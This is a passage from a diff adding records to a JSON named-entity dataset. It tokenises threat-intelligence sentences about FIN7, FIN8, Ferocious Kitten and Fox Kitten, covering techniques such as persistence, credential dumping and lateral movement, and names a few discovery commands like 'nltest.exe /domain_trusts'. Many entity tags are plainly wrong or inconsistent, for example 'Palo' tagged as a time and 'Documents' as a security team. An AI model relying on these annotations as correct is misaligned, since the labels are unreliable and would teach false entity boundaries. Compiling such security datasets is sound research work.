"attempted", + "to", + "run", + "Darkside", + "ransomware", + "with", + "the", + "filename", + "sleep.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "used", + "mshta.exe", + "to", + "execute", + "VBScript", + "to", + "execute", + "malicious", + "code", + "on", + "victim", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "used", + "port-protocol", + "mismatches", + "on", + "ports", + "such", + "as", + "53,", + "80,", + "443,", + "and", + "8080", + "during", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "used", + "a", + "PowerShell", + "script", + "to", + "launch", + "shellcode", + "that", + "retrieved", + "an", + "additional", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "malware", + "has", + "created", + "Registry", + "Run", + "and", + "RunOnce", + "keys", + "to", + "establish", + "persistence,", + "and", + "has", + "also", + "added", + "items", + "to", + "the", + "Startup", + "folder." + ], + "ner_tags": [ + "B-Idus", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "utilized", + "the", + "remote", + "management", + "tool", + "Atera", + "to", + "download", + "malware", + "to", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "used", + "RDP", + "to", + "move", + "laterally", + "in", + "victim", + "environments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "actors", + "have", + "mailed", + "USB", + "drives", + "to", + "potential", + "victims", + "containing", + "malware", + "that", + "downloads", + "and", + "installs", + "various", + "backdoors,", + "including", + "in", + "some", + "cases", + "for", + "ransomware", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "used", + "`rundll32.exe`", + "to", + "execute", + "malware", + "on", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "used", + "SSH", + "to", + "move", + "laterally", + "through", + "victim", + "environments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "malware", + "has", + "created", + "scheduled", + "tasks", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "captured", + "screenshots", + "and", + "desktop", + "video", + "recordings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "sent", + "spearphishing", + "emails", + "with", + "either", + "malicious", + "Microsoft", + "Documents", + "or", + "RTF", + "files", + "attached." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "I-SamFile", + "B-SecTeam", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "conducted", + "broad", + "phishing", + "campaigns", + "using", + "malicious", + "links." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "used", + "the", + "command", + "`cmd.exe", + "/C", + "quser`", + "to", + "collect", + "user", + "session", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "utilized", + "a", + "variety", + "of", + "tools", + "such", + "as", + "Cobalt", + "Strike,", + "PowerSploit,", + "and", + "the", + "remote", + "management", + "tool,", + "Atera", + "for", + "targeting", + "efforts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "staged", + "legitimate", + "software,", + "that", + "was", + "trojanized", + "to", + "contain", + "an", + "Atera", + "agent", + "installer,", + "on", + "Amazon", + "S3." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "used", + "images", + "embedded", + "into", + "document", + "lures", + "that", + "only", + "activate", + "the", + "payload", + "when", + "a", + "user", + "double", + "clicks", + "to", + "avoid", + "sandboxes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "used", + "TightVNC", + "to", + "control", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "harvested", + "valid", + "administrative", + "credentials", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "created", + "a", + "custom", + "video", + "recording", + "capability", + "that", + "could", + "be", + "used", + "to", + "monitor", + "operations", + "in", + "the", + "victim's", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "used", + "VBS", + "scripts", + "to", + "help", + "perform", + "tasks", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "set", + "up", + "Amazon", + "S3", + "buckets", + "to", + "host", + "trojanized", + "digital", + "products." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "used", + "the", + "command", + "prompt", + "to", + "launch", + "commands", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "has", + "used", + "WMI", + "to", + "install", + "malware", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN7", + "created", + "new", + "Windows", + "services", + "and", + "added", + "them", + "to", + "the", + "startup", + "directories", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "RAR", + "to", + "compress", + "collected", + "data", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "the", + "Plink", + "utility", + "to", + "tunnel", + "RDP", + "back", + "to", + "C2", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Org", + "I-Org", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "injected", + "malicious", + "code", + "into", + "a", + "new", + "svchost.exe", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "cleared", + "logs", + "during", + "post", + "compromise", + "cleanup", + "activities." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "an", + "expired", + "open-source", + "X.509", + "certificate", + "for", + "testing", + "in", + "the", + "OpenSSL", + "repository,", + "to", + "connect", + "to", + "actor-controlled", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "environment", + "variables", + "and", + "standard", + "input", + "(stdin)", + "to", + "obfuscate", + "command-line", + "arguments.", + "FIN8", + "also", + "obfuscates", + "malicious", + "macros", + "delivered", + "as", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "deployed", + "ransomware", + "such", + "as", + "Ragnar", + "Locker,", + "White", + "Rabbit,", + "and", + "attempted", + "to", + "execute", + "Noberus", + "on", + "compromised", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "retrieved", + "a", + "list", + "of", + "trusted", + "domains", + "by", + "using", + "<code>nltest.exe", + "/domain_trusts</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "FTP", + "to", + "exfiltrate", + "collected", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "exploited", + "the", + "CVE-2016-0167", + "local", + "vulnerability." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "deleted", + "tmp", + "and", + "prefetch", + "files", + "during", + "post", + "compromise", + "cleanup", + "activities.", + "FIN8", + "has", + "also", + "deleted", + "PowerShell", + "scripts", + "to", + "evade", + "detection", + "on", + "compromised", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "remote", + "code", + "execution", + "to", + "download", + "subsequent", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "the", + "Ping", + "command", + "to", + "check", + "connectivity", + "to", + "actor-controlled", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "harvests", + "credentials", + "using", + "Invoke-Mimikatz", + "or", + "Windows", + "Credentials", + "Editor", + "(WCE)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "malicious", + "e-mail", + "attachments", + "to", + "lure", + "victims", + "into", + "executing", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "emails", + "with", + "malicious", + "links", + "to", + "lure", + "victims", + "into", + "installing", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "deleted", + "Registry", + "keys", + "during", + "post", + "compromise", + "cleanup", + "activities." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "FIN8's", + "malicious", + "spearphishing", + "payloads", + "are", + "executed", + "as", + "PowerShell.", + "FIN8", + "has", + "also", + "used", + "PowerShell", + "for", + "lateral", + "movement", + "and", + "credential", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "aggregates", + "staged", + "data", + "from", + "a", + "network", + "into", + "a", + "single", + "location." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "RDP", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "dsquery", + "and", + "other", + "Active", + "Directory", + "utilities", + "to", + "enumerate", + "hosts;", + "they", + "have", + "also", + "used", + "<code>nltest.exe", + "/dclist</code>", + "to", + "retrieve", + "a", + "list", + "of", + "domain", + "controllers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "attempted", + "to", + "map", + "to", + "C$", + "on", + "enumerated", + "hosts", + "to", + "test", + "the", + "scope", + "of", + "their", + "current", + "credentials/context.", + "FIN8", + "has", + "also", + "used", + "smbexec", + "from", + "the", + "Impacket", + "suite", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "scheduled", + "tasks", + "to", + "maintain", + "RDP", + "backdoors." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "Registry", + "keys", + "to", + "detect", + "and", + "avoid", + "executing", + "in", + "potential", + "sandboxes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "distributed", + "targeted", + "emails", + "containing", + "Word", + "documents", + "with", + "embedded", + "malicious", + "macros." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "distributed", + "targeted", + "emails", + "containing", + "links", + "to", + "malicious", + "documents", + "with", + "embedded", + "macros." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "PowerShell", + "Scripts", + "to", + "check", + "the", + "architecture", + "of", + "a", + "compromised", + "machine", + "before", + "the", + "selection", + "of", + "a", + "32-bit", + "or", + "64-bit", + "version", + "of", + "a", + "malicious", + ".NET", + "loader." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "executed", + "the", + "command", + "`quser`", + "to", + "display", + "the", + "session", + "details", + "of", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "a", + "malicious", + "framework", + "designed", + "to", + "impersonate", + "the", + "lsass.exe/vmtoolsd.exe", + "token." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Tool" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "open-source", + "tools", + "such", + "as", + "Impacket", + "for", + "targeting", + "efforts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "valid", + "accounts", + "for", + "persistence", + "and", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "HTTPS", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "<code>sslip.io</code>,", + "a", + "free", + "IP", + "to", + "domain", + "mapping", + "service", + "that", + "also", + "makes", + "SSL", + "certificate", + "generation", + "easier", + "for", + "traffic", + "encryption,", + "as", + "part", + "of", + "their", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "a", + "Batch", + "file", + "to", + "automate", + "frequently", + "executed", + "post", + "compromise", + "cleanup", + "activities.", + "FIN8", + "has", + "also", + "executed", + "commands", + "remotely", + "via", + "`cmd.exe`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "FIN8's", + "malicious", + "spearphishing", + "payloads", + "use", + "WMI", + "to", + "launch", + "malware", + "and", + "spawn", + "`cmd.exe`", + "execution.", + "FIN8", + "has", + "also", + "used", + "WMIC", + "and", + "the", + "Impacket", + "suite", + "for", + "lateral", + "movement,", + "as", + "well", + "as", + "during", + "and", + "post", + "compromise", + "cleanup", + "activities." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN8", + "has", + "used", + "WMI", + "event", + "subscriptions", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Ferocious", + "Kitten", + "has", + "acquired", + "domains", + "imitating", + "legitimate", + "sites." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ferocious", + "Kitten", + "has", + "attempted", + "to", + "convince", + "victims", + "to", + "enable", + "malicious", + "content", + "within", + "a", + "spearphishing", + "email", + "by", + "including", + "an", + "odd", + "decoy", + "message." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ferocious", + "Kitten", + "has", + "named", + "malicious", + "files", + "<code>update.exe</code>", + "and", + "loaded", + "them", + "into", + "the", + "compromise", + "host's", + "“Public”", + "folder." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ferocious", + "Kitten", + "has", + "used", + "right-to-left", + "override", + "to", + "reverse", + "executables’", + "names", + "to", + "make", + "them", + "appear", + "to", + "have", + "different", + "file", + "extensions,", + "rather", + "than", + "their", + "real", + "ones." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ferocious", + "Kitten", + "has", + "conducted", + "spearphishing", + "campaigns", + "containing", + "malicious", + "documents", + "to", + "lure", + "victims", + "to", + "open", + "the", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ferocious", + "Kitten", + "has", + "obtained", + "open", + "source", + "tools", + "for", + "its", + "operations,", + "including", + "JsonCPP", + "and", + "Psiphon." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "sticky", + "keys", + "to", + "launch", + "a", + "command", + "prompt." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "7-Zip", + "to", + "archive", + "data." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "Google", + "Chrome", + "bookmarks", + "to", + "identify", + "internal", + "resources", + "and", + "assets." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "brute", + "forced", + "RDP", + "credentials." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "base64", + "encoded", + "scripts", + "to", + "avoid", + "detection." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "a", + "Perl", + "reverse", + "shell", + "to", + "communicate", + "with", + "C2." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "accessed", + "files", + "to", + "gain", + "valid", + "credentials." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "obtained", + "files", + "from", + "the", + "victim's", + "cloud", + "storage", + "instances." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "accessed", + "victim", + "security", + "and", + "IT", + "environments", + "and", + "Microsoft", + "Teams", + "to", + "mine", + "valuable", + "information." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SecTeam", + "I-SecTeam", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "searched", + "local", + "system", + "resources", + "to", + "access", + "sensitive", + "documents." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "searched", + "network", + "shares", + "to", + "access", + "sensitive", + "documents." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "the", + "Softerra", + "LDAP", + "browser", + "to", + "browse", + "documentation", + "on", + "service", + "accounts." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "base64", + "encoded", + "payloads", + "to", + "avoid", + "detection." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "created", + "KeyBase", + "accounts", + "to", + "communicate", + "with", + "ransomware", + "victims." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "exploited", + "known", + "vulnerabilities", + "in", + "Fortinet,", + "PulseSecure,", + "and", + "Palo", + "Alto", + "VPN", + "appliances." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Time", + "B-SecTeam", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "exploited", + "known", + "vulnerabilities", + "in", + "remote", + "services", + "including", + "RDP." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "WizTree", + "to", + "obtain", + "network", + "files", + "and", + "directory", + "listings." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "downloaded", + "additional", + "tools", + "including", + "PsExec", + "directly", + "to", + "endpoints." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "used", + "prodump", + "to", + "dump", + "credentials", + "from", + "LSASS." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "accessed", + "ntuser.dat", + "and", + "UserClass.dat", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "created", + "a", + "local", + "user", + "account", + "with", + "administrator", + "privileges." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-OffAct", + "B-Purp", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fox", + "Kitten", + "has", + "named", + "the", + "task", + "for", + "a", + "reverse", + "proxy", + 